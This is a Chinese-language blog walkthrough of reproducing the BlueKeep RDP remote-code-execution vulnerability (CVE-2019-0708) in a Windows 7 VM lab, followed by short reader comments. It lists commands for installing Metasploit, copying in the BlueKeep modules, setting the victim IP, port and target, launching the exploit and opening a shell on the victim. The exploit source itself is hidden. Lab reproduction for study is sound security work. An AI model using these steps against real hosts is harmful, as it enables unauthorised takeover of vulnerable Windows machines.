远程桌面代码执行CVE-2019-0708漏洞复现

奶糖味的代言 68 浏览 4

漏洞环境:

VM 虚拟机中的Windows7 SP1

远程桌面代码执行CVE-2019-0708漏洞复现

Windows7 SP1镜像下载链接:

ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

工具准备

使用如下命令一键安装metasploit-framework

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

下载Reference中的攻击套件放置文件到msf的相应文件夹如果已存在同名文件,直接覆盖即可,解压好

此部分已被隐藏

发表评论刷新页面后方可查看

这个压缩包,进入到文件所在的目录,复制下面命令到终端即可,如果提示不存在文件夹提示就自己创建一个。

cp rdp.rb  /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/
cp rdp_scanner.rb    /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/
cp cve_2019_0708_bluekeep.rb   /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/
cp cve_2019_0708_bluekeep_rce.rb  /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/

开始使用

在终端使用msfconsole进入metasploit-framework,或者直接点软件图标也行

进入以后使用reload_all命令重新加载0708利用模块,加载好以后可以搜索一下试试

远程桌面代码执行CVE-2019-0708漏洞复现

使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708攻击模块

使用info或者show options查看工具相关信息以及设置

远程桌面代码执行CVE-2019-0708漏洞复现

远程桌面代码执行CVE-2019-0708漏洞复现

可见关键设置主要为RHOSTS\ RPORT \ target
使用set RHOSTS 受害机IP设置受害机IP
使用set RPORT 受害机PORT设置受害机RDP端口号
使用set target ID数字(可选为0-4)设置受害机机器架构
使用exploit开始攻击,等待建立连接

远程桌面代码执行CVE-2019-0708漏洞复现
建立连接以后,使用shell获得shell,再使用python获得交互式shell,\或者直接回车几次

远程桌面代码执行CVE-2019-0708漏洞复现

随即完成攻击,成功拿到受害者主机权限

远程桌面代码执行CVE-2019-0708漏洞复现

参考资料

https://github.com/rapid7/metasploit-framework/pull/12283/files
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

发表评论 取消回复
表情 图片 链接 代码

  1. QuKin
    QuKin Lv 1

    学习学习

  2. r.Zhangか
    r.Zhangか Lv 1

    好文借鉴

  3. 衍行虚空
    衍行虚空 Lv 1

    认真学习一下

  4. Aya.
    Aya. Lv 1

    复现不成功,好像是防火墙的问题

分享